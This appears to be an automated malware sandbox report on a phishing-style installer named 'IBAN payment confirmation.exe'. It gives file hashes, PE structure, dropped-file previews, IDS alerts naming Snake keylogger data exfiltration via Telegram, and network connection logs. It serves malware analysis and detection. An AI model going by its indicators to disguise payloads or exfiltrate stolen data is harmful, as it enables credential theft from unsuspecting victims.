                                                                                                                            SHA-256:3B4CDB0644298528573EB3184C4CE3B7AF837D076AC21CDB070C7535974337A6
                                                                                                                            SHA-512:1BCB1E7209B190699397F910F853F025D87C0E1A9387CD6E87424EFCAAFE95BB535C530B15EDCAD01864DB3146C0D7EFE8E350476434B8DCFC6B6080A2E323B2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.:......,.......,.......\.......L$.......9.......:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):11264
                                                                                                                            Entropy (8bit):5.801108840712148
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                                                            MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                                                            SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                                                            SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                                                            SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                                            • Filename: WC10SCPMaX.exe, Detection: malicious, Browse
                                                                                                                            • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                            • Filename: CL714440147.exe, Detection: malicious, Browse
                                                                                                                            • Filename: TKnBbCiX07.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ________.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Snurrevoddenes.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Eksistensberettigelsernes102.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious, Browse
                                                                                                                            • Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):161977
                                                                                                                            Entropy (8bit):1.2465706431701635
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                                                            MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                                                            SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                                                            SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                                                            SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):29986
                                                                                                                            Entropy (8bit):4.560622606474619
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:Pgio3spWQ6sJqPBXqn9IZUaYdJM8qm06/:uspa3g9IZU51Vl
                                                                                                                            MD5:1D3EA1813CCF77D02EB0FA2A422D59C2
                                                                                                                            SHA1:243C701DA58EE2E5BA413CBF20A4398042F05D35
                                                                                                                            SHA-256:23274FE6F3C10490E791712D6EE69019919C6203CD1177AD326A1965A80A2E9B
                                                                                                                            SHA-512:72B9B883E660364782B87CE926631D424C2065B6F64EE5AC4E866FB949A7CFA47E4DD5C15B1F21900DC3E3C1E512F94B746E1582FFBEE36EE24C8D1AAE8D7D1C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:...........S...'................tttttt......DDD.......p...............FF...........|...........:.....MM...~.}}}}}.........WW.........A........KK....~...............................a.$..8.......w.22.UU..........ccccc..............X..t....!....................~........C.................................p.................666..................................c........W......................<<<.................66..............Y.y..LL...L...~..........................E......&&&&....................../..............................mm.......y.X..k...dd..........................................................=...............................UU..................................^^...........aa........................ww...........55555.O.v............................].[............o......++......Z.....................TTTTTT.....f.'........111..................OO.......................___...................................ZZZZ.XX........RRR.........I...........1.......).......zz.....................
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2929
                                                                                                                            Entropy (8bit):7.418910042244289
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                                                            MD5:49DAF4E74443D8502F3229468615185F
                                                                                                                            SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                                                            SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                                                            SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):461378
                                                                                                                            Entropy (8bit):1.252059381950645
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                                                            MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                                                            SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                                                            SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                                                            SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                                                            Malicious:false
                                                                                                                            Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):225641
                                                                                                                            Entropy (8bit):1.2362366155163755
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                                                            MD5:94C4B93474D07658FCBD411A20E68532
                                                                                                                            SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                                                            SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                                                            SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                                                            Malicious:false
                                                                                                                            Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):267270
                                                                                                                            Entropy (8bit):7.809499666102177
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:oGjnsVygU2HQWmx3h7D9/aVg4cx+1nVxOWKJkJz9nHA7k2s:9rEHQWmxJZy7gWKJkJz+s
                                                                                                                            MD5:B94CC3E728075F4C42FED48803C02F56
                                                                                                                            SHA1:7889BE1858ECD63B074214928821AF43D1AB4E3A
                                                                                                                            SHA-256:DF06C08893B9914C8B135C27D31D7ECB624B503C0C0EAE722E9A1E2C3BB18445
                                                                                                                            SHA-512:EC761E7DC0CB9DFA26DF933993FED93F1BEBF59CC6E65FDB48C8D36066D377F20B344C736B3594D76A41A085E764E4DEE20C143D3A47BF877D3900DEB4657DD2
                                                                                                                            Malicious:false
                                                                                                                            Preview:...<<<..........CC....-................>>>..............$...................%%%.+........>>.........EE...................R...c........B....22........D..pp.AA.RRR.....}}.l..........9........ll..1........bb.B..000...........pp........77.......xxxxx.wwwww......../.........oo.bb............................%%.SS...................(......................###.......................K..........o.......................................i.9....................2...III..................................vvv.......UU.4444.......HH..g...66....NN........%%.............QQ........N....%%............nnnn....4..TTTT....BBB..'...........................uuuu............F.ww.e.....................$$.......n.................}...$$$.......................s....................!!............................A......................mmm..GG.........................jjjjjjjj....~..............................................>............?.D....5...D.d...::................AAAA..FF........................!...WWW.............
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Entropy (8bit):7.036021399095367
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:IBAN payment confirmation.exe
                                                                                                                            File size:715'594 bytes
                                                                                                                            MD5:b134b557b86a160168de0c56ba982ea6
                                                                                                                            SHA1:7c6e7f286bc9de5bd66a5cf4713d7938e78ab3ae
                                                                                                                            SHA256:5b67270f1f8cfdbb96cfa359f9d9caa35fcfa9538ef8a3b27fff7b7001c3584c
                                                                                                                            SHA512:c0f192057f8a8f70508338ebf08637c0bbd36b86189e35f240a602da647617dddb2c8c8e8d7e4c0301d28263c29902147190470426b1e956950bee667de1a3e6
                                                                                                                            SSDEEP:12288:xlYZmcRHOkPavoNvBCkiVbFLTw3qH+ehqv5UR1aIoY:UmcdOkS8vBPi9KmqvSRgQ
                                                                                                                            TLSH:39E4E02F27164046FE9415F2B8A3DD47A1F9FEBC116973496CA2FE1790B7B70394A088
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                                            Icon Hash:058cc0e474936126
                                                                                                                            Entrypoint:0x40335a
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                            Instruction
                                                                                                                            sub esp, 000002D4h
                                                                                                                            push ebx
                                                                                                                            push ebp
                                                                                                                            push esi
                                                                                                                            push edi
                                                                                                                            push 00000020h
                                                                                                                            xor ebp, ebp
                                                                                                                            pop esi
                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                            mov dword ptr [esp+10h], 00409230h
                                                                                                                            mov dword ptr [esp+1Ch], ebp
                                                                                                                            call dword ptr [00407034h]
                                                                                                                            push 00008001h
                                                                                                                            call dword ptr [004070BCh]
                                                                                                                            push ebp
                                                                                                                            call dword ptr [004072ACh]
                                                                                                                            push 00000008h
                                                                                                                            mov dword ptr [00429298h], eax
                                                                                                                            call 00007F65A850098Ch
                                                                                                                            mov dword ptr [004291E4h], eax
                                                                                                                            push ebp
                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                            push 000002B4h
                                                                                                                            push eax
                                                                                                                            push ebp
                                                                                                                            push 00420690h
                                                                                                                            call dword ptr [0040717Ch]
                                                                                                                            push 0040937Ch
                                                                                                                            push 004281E0h
                                                                                                                            call 00007F65A85005F7h
                                                                                                                            call dword ptr [00407134h]
                                                                                                                            mov ebx, 00434000h
                                                                                                                            push eax
                                                                                                                            push ebx
                                                                                                                            call 00007F65A85005E5h
                                                                                                                            push ebp
                                                                                                                            call dword ptr [0040710Ch]
                                                                                                                            cmp word ptr [00434000h], 0022h
                                                                                                                            mov dword ptr [004291E0h], eax
                                                                                                                            mov eax, ebx
                                                                                                                            jne 00007F65A84FDADAh
                                                                                                                            push 00000022h
                                                                                                                            mov eax, 00434002h
                                                                                                                            pop esi
                                                                                                                            push esi
                                                                                                                            push eax
                                                                                                                            call 00007F65A8500036h
                                                                                                                            push eax
                                                                                                                            call dword ptr [00407240h]
                                                                                                                            mov dword ptr [esp+18h], eax
                                                                                                                            jmp 00007F65A84FDB9Eh
                                                                                                                            push 00000020h
                                                                                                                            pop edx
                                                                                                                            cmp cx, dx
                                                                                                                            jne 00007F65A84FDAD9h
                                                                                                                            inc eax
                                                                                                                            inc eax
                                                                                                                            cmp word ptr [eax], dx
                                                                                                                            je 00007F65A84FDACBh
                                                                                                                            add word ptr [eax], 0000h
                                                                                                                            Programming Language:
                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x43188.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .ndata0x2a0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rsrc0x5f0000x431880x43200ad79ab7bc0418c21ba04b90eb50d4a0cFalse0.18500494646182494data4.605797713668011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_BITMAP0x5f2b00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                            RT_ICON0x5f6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1810552711779152
                                                                                                                            RT_DIALOG0xa16400x144dataEnglishUnited States0.5216049382716049
                                                                                                                            RT_DIALOG0xa17880x13cdataEnglishUnited States0.5506329113924051
                                                                                                                            RT_DIALOG0xa18c80x100dataEnglishUnited States0.5234375
                                                                                                                            RT_DIALOG0xa19c80x11cdataEnglishUnited States0.6091549295774648
                                                                                                                            RT_DIALOG0xa1ae80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                            RT_DIALOG0xa1bb00x60dataEnglishUnited States0.7291666666666666
                                                                                                                            RT_GROUP_ICON0xa1c100x14dataEnglishUnited States1.1
                                                                                                                            RT_VERSION0xa1c280x258dataEnglishUnited States0.5216666666666666
                                                                                                                            RT_MANIFEST0xa1e800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-03T15:20:11.187457+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749841172.217.19.174443TCP
                                                                                                                            2024-12-03T15:20:26.610765+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749862132.226.247.7380TCP
                                                                                                                            2024-12-03T15:20:34.829536+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749862132.226.247.7380TCP
                                                                                                                            2024-12-03T15:20:36.970827+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749903149.154.167.220443TCP
                                                                                                                            2024-12-03T15:20:38.657701+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749909132.226.247.7380TCP
                                                                                                                            2024-12-03T15:20:40.631481+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749913149.154.167.220443TCP
                                                                                                                            2024-12-03T15:20:43.220296+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749919132.226.247.7380TCP
                                                                                                                            2024-12-03T15:20:45.275440+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749926149.154.167.220443TCP
                                                                                                                            2024-12-03T15:20:48.795846+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749935149.154.167.220443TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 3, 2024 15:20:08.454485893 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:08.454507113 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:08.454580069 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:08.466970921 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:08.466984987 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:10.258627892 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:10.258781910 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:10.259515047 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:10.259602070 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:10.345861912 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:10.345892906 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:10.346281052 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:10.348213911 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:10.352227926 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:10.399327993 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.187448025 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.187581062 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:11.187602997 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.187650919 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:11.187911034 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:11.187947035 CET44349841172.217.19.174192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.187998056 CET49841443192.168.2.7172.217.19.174
                                                                                                                            Dec 3, 2024 15:20:11.342762947 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:11.342813969 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.342976093 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:11.343244076 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:11.343256950 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:13.044450045 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:13.044538975 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:13.048747063 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:13.048757076 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:13.049067020 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:13.049122095 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:13.056226015 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:13.103329897 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.793368101 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.793507099 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.806154013 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.806277990 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.913569927 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.913695097 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.913712025 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.913758039 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.917422056 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.917511940 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.985066891 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.985188961 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.987289906 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.987337112 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:15.995471001 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.995547056 CET49850443192.168.2.7142.250.181.1
